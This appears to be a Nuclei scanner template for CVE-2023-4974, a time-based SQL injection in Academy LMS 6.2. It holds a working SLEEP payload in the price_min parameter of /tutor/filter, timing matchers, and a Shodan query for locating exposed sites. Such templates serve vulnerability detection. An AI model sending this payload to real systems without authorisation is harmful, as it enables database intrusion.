47 lines
1.9 KiB
YAML
47 lines
1.9 KiB
YAML
id: CVE-2023-4974
|
|
|
|
info:
|
|
name: Academy LMS 6.2 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
|
|
reference:
|
|
- https://demo.creativeitem.com/academy/
|
|
- https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4974
|
|
- http://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
|
|
- https://vuldb.com/?ctiid.239750
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-4974
|
|
cwe-id: CWE-89
|
|
epss-score: 0.02282
|
|
epss-percentile: 0.88463
|
|
cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: creativeitem
|
|
product: academy_lms
|
|
shodan-query: html:"Academy LMS"
|
|
tags: packetstorm,cve,cve2023,sqli,academy,lms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- duration>=7
|
|
- status_code == 500
|
|
- contains(body, "Courses</span>")
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450220134684323e1092c19b32c5ff618bfae9353af4fc4962bfb55556f8bb62f8808a022100efda53e843b12f5821c63cd1e9ba7cb35b044ddf61a2f620861472aff5d90a31:922c64590222798bb761d5b6d8e72950
|